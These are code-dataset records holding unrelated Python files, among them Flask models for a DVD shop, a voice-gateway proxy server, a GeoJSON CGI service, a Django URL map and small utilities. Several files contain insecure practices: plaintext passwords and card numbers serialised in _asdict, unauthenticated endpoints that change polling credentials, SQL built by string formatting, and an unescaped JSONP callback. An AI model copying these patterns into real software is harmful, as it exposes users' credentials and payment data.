db.Column(db.Integer)\n\tcountry = db.Column(db.String(50), nullable=False)\n\tregion = db.Column(db.SmallInteger, nullable=False)\n\temail = db.Column(db.String(50))\n\tphone = db.Column(db.String(50))\n\tcreditcardtype = db.Column(db.Integer, nullable=False)\n\tcreditcard = db.Column(db.String(50), nullable=False)\n\tcreditcardexpiration = db.Column(db.String(50), nullable=False)\n\tusername = db.Column(db.String(50), nullable=False, unique=True)\n\tpassword = db.Column(db.String(50), nullable=False)\n\tage = db.Column(db.SmallInteger)\n\tincome = db.Column(db.Integer)\n\tgender = db.Column(db.String(1))\n\tversion_id= db.Column(db.Integer, default=0)\n\tbeingedited = db.Column(db.Boolean, default=False)\n\n\tdef _asdict(self):\n\t\treturn {\n\t\t\t\"id\": self.customerid,\n\t\t\t\"firstname\": self.firstname,\n\t\t\t\"lastname\": self.lastname,\n\t\t\t\"address1\": self.address1,\n\t\t\t\"address2\": self.address2,\n\t\t\t\"city\": self.city,\n\t\t\t\"state\": self.state,\n\t\t\t\"zip\": self.zip,\n\t\t\t\"country\": self.country,\n\t\t\t\"region\": self.region,\n\t\t\t\"email\": self.email,\n\t\t\t\"phone\": self.phone,\n\t\t\t\"creditcardtype\": self.creditcardtype,\n\t\t\t\"creditcard\": self.creditcard,\n\t\t\t\"creditcardexpiration\": self.creditcardexpiration,\n\t\t\t\"username\": self.username,\n\t\t\t\"password\": self.password,\n\t\t\t\"age\": self.age,\n\t\t\t\"income\": self.income,\n\t\t\t\"gender\": self.gender,\n\t\t\t\"version_id\": self.version_id\n\t\t}\n\n\nclass Inventory(db.Model):\n\t__tablename__ = 'inventory'\n\n\tprod_id = db.Column(db.Integer, primary_key=True)\n\tquan_in_stock = db.Column(db.Integer, nullable=False)\n\tsales = db.Column(db.Integer, nullable=False)\n\n\tdef _asdict(self):\n\t\treturn {\n\t\t\t\"prod_id\": self.prod_id,\n\t\t\t\"quan_in_stock\": self.quan_in_stock,\n\t\t\t\"sales\": self.sales\n\t\t}\n\n\nt_orderlines = db.Table(\n\t'orderlines',\n\tdb.Column('orderlineid', db.Integer, nullable=False),\n\tdb.Column('orderid', db.ForeignKey('orders.orderid', ondelete='CASCADE'), nullable=False),\n\tdb.Column('prod_id', db.ForeignKey('products.prod_id'), nullable=False),\n\tdb.Column('quantity', db.SmallInteger, nullable=False),\n\tdb.Column('orderdate', db.Date, nullable=False),\n\tdb.Index('ix_orderlines_orderid', 'orderid', 'orderlineid'))\n\n\nclass Order(db.Model):\n\t__tablename__ = 'orders'\n\n\torderid = db.Column(db.Integer, primary_key=True, server_default=db.FetchedValue())\n\torderdate = db.Column(db.Date, nullable=False)\n\tcustomerid = db.Column(db.ForeignKey('customers.customerid', ondelete='SET NULL'), index=True)\n\tnetamount = db.Column(db.Numeric(12, 2), nullable=False)\n\ttax = db.Column(db.Numeric(12, 2), nullable=False)\n\ttotalamount = db.Column(db.Numeric(12, 2), nullable=False)\n\n\tcustomer = db.relationship('Customer', primaryjoin='Order.customerid == Customer.customerid', backref='orders')\n\titems = db.relationship('Product', secondary=t_orderlines, backref=\"orderid\")\n\n\tdef _asdict(self):\n\t\treturn {\n\t\t\t\"orderid\": self.orderid,\n\t\t\t\"orderdate\": self.orderdate,\n\t\t\t\"customerid\": self.customerid,\n\t\t\t\"netamount\": self.netamount,\n\t\t\t\"tax\": self.tax,\n\t\t\t\"totalamount\": self.totalamount,\n\t\t\t\"items\": self.items\n\t\t}\n\n\nclass Product(db.Model):\n\t__tablename__ = 'products'\n\n\tprod_id = db.Column(db.Integer, primary_key=True, server_default=db.FetchedValue())\n\tcategory = db.Column(db.Integer, nullable=False, index=True)\n\ttitle = db.Column(db.String(50), nullable=False)\n\tactor = db.Column(db.String(50), nullable=False)\n\tprice = db.Column(db.Numeric(12, 2), nullable=False)\n\tspecial = db.Column(db.SmallInteger, index=True)\n\tcommon_prod_id = db.Column(db.Integer, nullable=False)\n\n\tdef _asdict(self):\n\t\treturn {\n\t\t\t\"prod_id\": self.prod_id,\n\t\t\t\"category\": self.category,\n\t\t\t\"title\": self.title,\n\t\t\t\"actor\": self.actor,\n\t\t\t\"price\": self.price,\n\t\t\t\"special\": self.special,\n\t\t\t\"common_prod_id\": self.common_prod_id\n\t\t}\n\n\nt_reorder = db.Table(\n\t'reorder',\n\tdb.Column('prod_id', db.Integer, nullable=False),\n\tdb.Column('date_low', db.Date, nullable=False),\n\tdb.Column('quan_low', db.Integer, nullable=False),\n\tdb.Column('date_reordered', db.Date),\n\tdb.Column('quan_reordered', db.Integer),\n\tdb.Column('date_expected', db.Date))\n","sub_path":"FLASK/DVD/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14394588","text":"# ------------------------------------------------\n# IMPORTS ----------------------------------------\n# ------------------------------------------------\n#####\n# Python dist and 3rd party libraries\n#####\nimport os, requests, json, string, datetime, logging, time\n\nfrom os.path import join, dirname\nfrom flask import Flask, request, render_template, redirect, url_for, Response\nfrom voicefilters import response_filter, check_utterance, need_connexusID, check_ssml_number, cleanResponseForGateway\nfrom weblogger import addLogEntry\nfrom fromGatewayFilter import inputFilters\nfrom checkGatewaySignal import signals\nfrom checkClientWaitState import waitState\nfrom checkDTMF import dtmf\nfrom checkUtterance import utterance\nfrom callSystemOfRecordBeforeConversation import callSORBeforeConv\nfrom callConversation import callConversationService\nfrom checkPollingBackend import pollBackend\nfrom callSystemOfRecordAfterConversation import callSORAfterConv\nfrom checkConversationSignal import wcsSignals\nfrom toGatewayFilter import outputFilter\nimport voiceProxyUtilities\nimport voiceProxySettings\n\nvoiceProxySettings.init()\n\n\n# ------------------------------------------------\n# FLASK ------------------------------------------\n# ------------------------------------------------\napp = Flask(__name__)\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\nlogging_comp_name = \"Voice Proxy Main Loop\"\n\n@app.route('/docs/CognitiveIntegrationServiceServer')\ndef documentPage():\n return app.send_static_file('docs/CognitiveIntegrationServiceServer.html')\n\n\n@app.route('/docs/images/image00.png')\ndef documentImage():\n return app.send_static_file('docs/images/image00.png')\n \t\n# ------------- Main loop for CIS ----------------\n\n@app.route('/v1/workspaces//', methods=['POST'])\ndef restVoiceGatewayEntry(spaceid,msg):\t\n\tresp_data = voiceGatewayEntry(spaceid,msg)\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\t\ndef voiceGatewayEntry(spaceid,msg):\n\t#Get data from post -- should be in the form of a conversation message\t\n\tmessage = json.loads(request.data)\n\n\t##### First Check to see if the message passed to the Server is valid format #######\n\tif not checkGatewayMessage(message):\n\t\t# Need to know how to signal the Gateway something is wrong\n\t\tmessage = returningEarlyCleanup(message,'Gateway Message Check Failed -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\n\taddLogEntry(voiceProxySettings.APP_NAME_LOGGING, logging_comp_name, 'New API Call', message)\n\tmessage = inputFilters(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'inputFilters -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\n\tmessage = signals(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'signals -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = waitState(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'waitState -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = dtmf(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'dtmf -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = utterance(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'utterance -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\t\n\tmessage = pollBackend(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'pollbackend -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\t\n\tmessage = callSORBeforeConv(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'callBackend1 -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\t\n\tmessage = callConversationService(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'callConversation -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = wcsSignals(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'callWcsSignal -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\t\n\tmessage = callSORAfterConv(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'callBackend2 -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = outputFilter(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'outputFilters -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\t\n\t# Finally Returning to Gateway\n\taddLogEntry(voiceProxySettings.APP_NAME_LOGGING, logging_comp_name, 'Normal Return to Gateway', message)\n\treturn json.dumps(message, separators=(',',':'))\n\t\n\n\n\n#-------------- Gateway Utility Methods ----------------------\n# First method calldd \ndef checkGatewayMessage(message):\n\treturn True\n\n\ndef earlyReturn(message):\n\treturn voiceProxyUtilities.earlyReturn(message)\n\t\ndef returningEarlyCleanup(message, logmessage):\n\tearlyMsg = voiceProxyUtilities.getCisAttribute('earlyReturnMsg',message)\n\tif earlyMsg and len(earlyMsg)>0:\n\t\taddLogEntry(voiceProxySettings.APP_NAME_LOGGING, logging_comp_name, earlyMsg, message)\n\t\tmessage = voiceProxyUtilities.clearCisAttribute('earlyReturn',message)\n\t\tmessage = voiceProxyUtilities.clearCisAttribute('earlyReturnMsg',message)\n\telse:\n\t\taddLogEntry(voiceProxySettings.APP_NAME_LOGGING, logging_comp_name, logmessage, message)\n\t\tmessage = voiceProxyUtilities.clearCisAttribute('earlyReturn',message)\n\t\tmessage = voiceProxyUtilities.clearCisAttribute('earlyReturnMsg',message)\t\n\t\n\tmessage = outputFilter(message)\n\t\n\treturn message\n\n#-------------- End Gateway Utility Methods ------------------\n\n\n\n#-------------- API Methods ----------------------------------\n@app.route('/cis/bargein', methods=['POST','GET', 'PUT'])\ndef apiBargin():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisBargein' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.BARGE_IN_ENABLED = data['cisContext']['cisBargein']\n\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisBargein' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.BARGE_IN_ENABLED = data['cisContext']['cisBargein']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n@app.route('/cis/weblogging', methods=['POST','GET', 'PUT'])\ndef apiWeblogging():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisWebLogging' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.WEB_LOGGING = data['cisContext']['cisWebLogging']\n\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisWebLogging' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.WEB_LOGGING = data['cisContext']['cisWebLogging']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n@app.route('/cis/customerWait', methods=['POST','GET', 'PUT'])\ndef apiCustomerWait():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisCustomerWait' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.ALLOW_CUSTOMER_SET_WAIT = data['cisContext']['cisCustomerWait']\n\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisCustomerWait' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.ALLOW_CUSTOMER_SET_WAIT = data['cisContext']['cisCustomerWait']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n@app.route('/cis/dtmf', methods=['POST','GET', 'PUT'])\ndef apidtmf():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisDTMF' in data['cisContext']:\n\t\t\t\tif 'enabled' in data['cisContext']['cisDTMF']:\n\t\t\t\t\tvoiceProxySettings.DTMF_ENABLED = data['cisContext']['cisDTMF']['enabled']\n\t\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisDTMF' in data['cisContext']:\n\t\t\t\tif 'enabled' in data['cisContext']['cisDTMF']:\n\t\t\t\t\tvoiceProxySettings.DTMF_ENABLED = data['cisContext']['cisDTMF']['enabled']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n\n@app.route('/cis/polling', methods=['POST','GET', 'PUT'])\ndef apiPolling():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisPolling' in data['cisContext']:\n\t\t\t\tif 'sleepTime' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_SLEEP_TIME = data['cisContext']['cisPolling']['sleepTime']\n\t\t\t\tif 'URL' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_URL = data['cisContext']['cisPolling']['URL']\n\t\t\t\tif 'username' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_USERNAME = data['cisContext']['cisPolling']['username']\n\t\t\t\tif 'password' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_PASSWORD = data['cisContext']['cisPolling']['password']\n\t\t\n\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisPolling' in data['cisContext']:\n\t\t\t\tif 'sleepTime' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_SLEEP_TIME = data['cisContext']['cisPolling']['sleepTime']\n\t\t\t\tif 'URL' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_URL = data['cisContext']['cisPolling']['URL']\n\t\t\t\tif 'username' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_USERNAME = data['cisContext']['cisPolling']['username']\n\t\t\t\tif 'password' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_PASSWORD = data['cisContext']['cisPolling']['password']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n\n#-------------- End API Methods ------------------------------\n\n\n\n\n\n\n\nport = os.getenv('PORT', '5000')\nif __name__ == \"__main__\":\n\tapp.run(host='0.0.0.0', port=int(port))","sub_path":"jj-voice-gateway/sample.voice.gateway/soe/python/voiceProxyServer.py","file_name":"voiceProxyServer.py","file_ext":"py","file_size_in_byte":10862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"173354630","text":"#!/usr/bin/env python\n\"\"\"GeoJSON service for HUC12 data\"\"\"\nimport json\nimport cgi\nimport datetime\n\nimport memcache\nfrom pyiem.dep import RAMPS\nfrom pyiem.util import get_dbconn, ssw\n\n\ndef do(ts, ts2, domain):\n \"\"\"Do work\"\"\"\n pgconn = get_dbconn('idep')\n cursor = pgconn.cursor()\n utcnow = datetime.datetime.utcnow()\n dextra = \"valid = %s\"\n args = (ts,)\n if ts2 is not None:\n dextra = \"valid >= %s and valid <= %s\"\n args = (ts, ts2)\n domainextra = ''\n if domain is not None:\n domainextra = \" and states ~* '%s'\" % (domain[:2].upper(),)\n cursor.execute(\"\"\"WITH data as (\n SELECT ST_asGeoJson(ST_Transform(simple_geom, 4326), 4) as g,\n huc_12\n from huc12 WHERE scenario = 0 \"\"\" + domainextra + \"\"\"), obs as (\n SELECT huc_12,\n sum(coalesce(avg_loss, 0)) * 4.463 as avg_loss,\n sum(coalesce(avg_delivery, 0)) * 4.463 as avg_delivery,\n sum(coalesce(qc_precip, 0)) / 25.4 as qc_precip,\n sum(coalesce(avg_runoff, 0)) / 25.4 as avg_runoff\n from results_by_huc12 WHERE\n \"\"\"+dextra+\"\"\" and scenario = 0 GROUP by huc_12)\n\n SELECT d.g, d.huc_12,\n coalesce(o.avg_loss, 0),\n coalesce(o.qc_precip, 0),\n coalesce(o.avg_delivery, 0),\n coalesce(o.avg_runoff, 0)\n from data d LEFT JOIN obs o ON (d.huc_12 = o.huc_12)\n \"\"\", args)\n res = {'type': 'FeatureCollection',\n 'date': ts.strftime(\"%Y-%m-%d\"),\n 'date2': None if ts2 is None else ts2.strftime(\"%Y-%m-%d\"),\n 'features': [],\n 'generation_time': utcnow.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n 'count': cursor.rowcount}\n avg_loss = []\n qc_precip = []\n avg_delivery = []\n avg_runoff = []\n for row in cursor:\n avg_loss.append(row[2])\n qc_precip.append(row[3])\n avg_delivery.append(row[4])\n avg_runoff.append(row[5])\n res['features'].append(dict(type=\"Feature\",\n id=row[1],\n properties=dict(\n avg_loss=row[2],\n qc_precip=row[3],\n avg_delivery=row[4],\n avg_runoff=row[5]),\n geometry=json.loads(row[0])\n ))\n myramp = RAMPS['english'][0]\n if ts2 is not None:\n days = (ts2 - ts).days\n myramp = RAMPS['english'][1]\n if days > 31:\n myramp = RAMPS['english'][2]\n\n res['jenks'] = dict(avg_loss=myramp,\n qc_precip=myramp,\n avg_delivery=myramp,\n avg_runoff=myramp)\n return json.dumps(res)\n\n\ndef main():\n \"\"\"Do Fun things\"\"\"\n ssw(\"Content-Type: application/vnd.geo+json\\n\\n\")\n form = cgi.FieldStorage()\n cb = form.getfirst('callback', None)\n domain = form.getfirst('domain', None)\n ts = datetime.datetime.strptime(form.getfirst('date', '2015-05-05'),\n '%Y-%m-%d')\n ts2 = None\n if form.getfirst('date2', None) is not None:\n ts2 = datetime.datetime.strptime(form.getfirst('date2'), '%Y-%m-%d')\n\n mckey = (\"/geojson/huc12/%s/%s/%s\"\n ) % (ts.strftime(\"%Y%m%d\"),\n '' if ts2 is None else ts2.strftime(\"%Y%m%d\"),\n '' if domain is None else domain)\n mc = memcache.Client(['iem-memcached:11211'], debug=0)\n res = mc.get(mckey)\n if not res:\n res = do(ts, ts2, domain)\n mc.set(mckey, res, 3600)\n\n if cb is None:\n ssw(res)\n else:\n ssw(\"%s(%s)\" % (cb, res))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"htdocs/geojson/huc12.py","file_name":"huc12.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"103902637","text":"# basic example of getting the HTML from a website that is rendered on the client-side by javascript \n# with the function ReturnHTML(url) from the scrape.py script\n# the raw data obtained is saved in a .txt file\n\nimport scrape\n\ndef main():\n url = input(\"Write the url inside parenthises. url=\")\n # url should be inside parenthises\n if (url[0] == '\"') & (url[len(url)-1] == '\"'):\n print(\"going to\")\n # calling the function ReturnHTML from the scrape.py script\n rawHTML = scrape.ReturnHTML(url)\n # save raw HTML to .txt file\n saveTxt(\"raw-html.txt\",rawHTML) \n else:\n print(\"something's missing\")\n url = input(\"Write the url inside parenthises. url=\")\n\ndef saveTxt(path,data):\n print(\"going to save the data into a .txt\")\n file = open(path,\"w\") \n file.write(str(data)) \n print(str(len(data))+\" characters saved. *bye*\")\n file.close() \n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"508182986","text":"\"\"\"xgjz URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, patterns, include\nfrom django.contrib import admin\nfrom users.views import home,UserLogin, UserRegister, UserPage, RedirectToUserpage, UserLogout, Exam, Avatar\nfrom biaoqingbao.views import biaoqinglist, allbiaoqinglist\nfrom weibo.views import Weibo\nfrom zssp.views import allArticle, oneArticle\nfrom txfs.views import allVideo, oneVideo\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nurlpatterns = [\n #url(r'^admin/', admin.site.urls),\n url(r'^$', home),\n url(r'^login/$', UserLogin),\n url(r'^register/$', UserRegister),\n #url(r'^findPassword/$', FindPassword),\n url(r'^(\\d+)/$', UserPage),\n url(r'^(\\d+)/avatar/$', Avatar),\n #url(r'^(\\d+)/changePassword/$', ChangePassword),\n #url(r'^(\\d+)/relationList/$', RelationList),\n url(r'^uploadbiaoqing/$', RedirectToUserpage),\n url(r'^(\\d+)/exam/$', Exam),\n url(r'^loggedout/$', UserLogout),\n url(r'^(\\d+)/biaoqingbao/$', biaoqinglist),\n url(r'^allbiaoqing/$', allbiaoqinglist),\n url(r'^tanxiaofengsheng/$', allVideo),\n url(r'^tanxiaofengsheng/video(\\d+)/$', oneVideo),\n url(r'^weibo/$', Weibo),\n #url(r'^weibo/(\\d+)/album/$', Album),\n url(r'^zishishuiping/$', allArticle),\n url(r'^zishishuiping/article(\\d+)/$', oneArticle),\n url(r'^media/(?P.*)', 'django.views.static.serve', {'document_root': os.path.join(BASE_DIR, 'media/')}),\n]","sub_path":"xgjz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"6359313","text":"import tracemalloc\nimport json\nimport time\nimport logging\nimport os\nimport functools\nlog = logging.getLogger(__name__)\n\n\ndef _nested_tuple_from_nested_list(nl):\n if isinstance(nl, list):\n tuple_base = (_nested_tuple_from_nested_list(nested) for nested in nl)\n return tuple(tuple_base)\n return nl\n\n\nclass TracemallocJsonEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, tracemalloc.Snapshot):\n return o.__dict__\n elif isinstance(o, tracemalloc._Traces):\n return list(o)\n elif isinstance(o, tracemalloc.Trace):\n return o._trace\n return super().default(o)\n\n\nclass TracemallocJsonDecoder(json.JSONDecoder):\n \"\"\"\n Deserializes tracemalloc.Snapshot instances created with TracemallocJsonEncoder\n use with json.load/loads - pass class (not instance) in cls argument\n \"\"\"\n def decode(self, s):\n raw = super().decode(s)\n return tracemalloc.Snapshot(\n traces=[_nested_tuple_from_nested_list(_t) for _t in raw['traces']],\n traceback_limit=raw['traceback_limit']\n )\n\n\nclass TracemallocWorker:\n def __init__(self):\n pass\n\n def set_tracking(self, tracemalloc_depth):\n if tracemalloc_depth > 0 and tracemalloc.is_tracing() and tracemalloc_depth != tracemalloc.get_traceback_limit():\n tracemalloc.stop()\n tracemalloc.start(tracemalloc_depth)\n pass\n\n if tracemalloc_depth > 0 and tracemalloc.is_tracing() == False:\n tracemalloc.start(tracemalloc_depth)\n\n if tracemalloc_depth == 0:\n tracemalloc.stop()\n\n def take_snapshot(self):\n if tracemalloc.is_tracing():\n return tracemalloc.take_snapshot()\n\n def write_snapshot(self, snapshot, dump_filename):\n try:\n with open(dump_filename, mode='w') as f:\n json.dump(snapshot, f, cls=TracemallocJsonEncoder)\n except:\n log.info(\"Unable to write tracemalloc json dump path: %s\", dump_filename, exc_info=1)\n\n\nclass TracemallocDriver:\n def __init__(self, external_api):\n self.external_api = external_api\n self.snapshot_storage_path = self.external_api.get_log_path()\n log.info(\"Memory snapshot storage_path %s\", self.snapshot_storage_path)\n self.worker = TracemallocWorker()\n\n def process_memory_usage(self):\n try:\n tracemalloc_depth = self.external_api.get_int_debug_flag(\"debugPluginAgentTracemallocDepthNative\", 0)\n tracemalloc_dumps = self.external_api.get_bool_debug_flag(\"debugPluginAgentTracemallocDumpsNative\", False)\n self.worker.set_tracking(tracemalloc_depth)\n\n if tracemalloc_depth > 0 and tracemalloc_dumps:\n log.info(\"Started taking memory snapshot\")\n snapshot = self.worker.take_snapshot()\n if tracemalloc_dumps:\n self.worker.write_snapshot(\n snapshot,\n dump_filename=self._snapshot_filename()\n )\n log.info(\"Finished taking memory snapshot\")\n except:\n log.info(\"Processing memory usage failed with exception\", exc_info=1)\n\n def _snapshot_filename(self):\n pid = os.getpid()\n timestamp = str(time.monotonic()).replace('.', \"_\")\n return os.path.join(self.snapshot_storage_path, \"pluginagent_tracemalloc_jsond_%s_%s.json\" % (pid, timestamp))\n\n\ndef run_on_interval_decorator(f, interval):\n last_run = None\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n nonlocal last_run\n current_timestamp = time.monotonic()\n if not last_run or current_timestamp - last_run >= interval:\n last_run = current_timestamp\n f(*args, **kwargs)\n return wrapper\n\n","sub_path":"venv/Lib/site-packages/ruxit/mem_tracking.py","file_name":"mem_tracking.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"594301913","text":"import fcntl\nimport time\n\nclass Mutex(object):\n\n DexterLockI2C_handle = None\n\n def __init__(self, debug = False):\n self.mutex_debug = debug\n\n def acquire(self):\n if self.mutex_debug:\n print(\"I2C mutex acquire\")\n\n acquired = False\n while not acquired:\n try:\n self.DexterLockI2C_handle = open('/run/lock/DexterLockI2C', 'w')\n # lock\n fcntl.lockf(self.DexterLockI2C_handle, fcntl.LOCK_EX | fcntl.LOCK_NB)\n acquired = True\n except IOError: # already locked by a different process\n time.sleep(0.001)\n except Exception as e:\n print(e)\n\n if self.mutex_debug:\n print(\"I2C mutex acquired {}\".format(time.time()))\n\n def release(self):\n if self.mutex_debug:\n print(\"I2C mutex release: {}\".format(time.time()))\n if self.DexterLockI2C_handle is not None and self.DexterLockI2C_handle is not True:\n self.DexterLockI2C_handle.close()\n self.DexterLockI2C_handle = None\n time.sleep(0.001)\n\n def enableDebug(self):\n self.mutex_debug = True\n\n def disableDebug(self):\n self.mutex_debug = False\n\n def __enter__(self):\n if self.mutex_debug:\n print(\"I2C mutex enter\")\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n if self.mutex_debug:\n print(\"I2C mutex exit\")\n self.release()\n","sub_path":"API/I2C_mutex.py","file_name":"I2C_mutex.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"297141782","text":"import logging\nimport logging.handlers\nimport sys\nimport os.path\n\n\nclass Logger(object):\n \"\"\"\n Logger objects with initialized File and Syslog logger.\n \"\"\"\n _logger = None\n _logname = None\n _logger_amslib = None\n\n def _init_stdout(self):\n lfs = '%(levelname)s - %(message)s'\n lf = logging.Formatter(lfs)\n lv = logging.INFO\n\n logging.basicConfig(format=lfs, level=lv, stream=sys.stderr)\n self._logger = logging.getLogger(self._logname)\n\n def _init_amslib(self):\n self._logger_amslib = logging.getLogger('argo_ams_library')\n\n def _init_filelog(self, logfile):\n lfs = '%(asctime)s %(name)s[%(process)s]: %(levelname)s - %(message)s'\n lf = logging.Formatter(fmt=lfs, datefmt='%Y-%m-%d %H:%M:%S')\n lv = logging.INFO\n\n sf = logging.handlers.RotatingFileHandler(logfile, maxBytes=512 * 1024, backupCount=4)\n self._logger.fileloghandle = sf.stream\n sf.setFormatter(lf)\n sf.setLevel(lv)\n self._logger.addHandler(sf)\n if self._logger_amslib:\n self._logger_amslib.fileloghandle = sf.stream\n self._logger_amslib.addHandler(sf)\n\n def __init__(self, logname, logdir):\n self._logname = logname\n try:\n if not os.path.isdir(logdir):\n os.makedirs(logdir)\n self._init_amslib()\n self._init_stdout()\n self._init_filelog(logdir + self._logname + '.log')\n except (OSError, IOError) as e:\n sys.stderr.write('ERROR - ' + str(e) + '\\n')\n raise SystemExit(1)\n\n def get(self):\n return 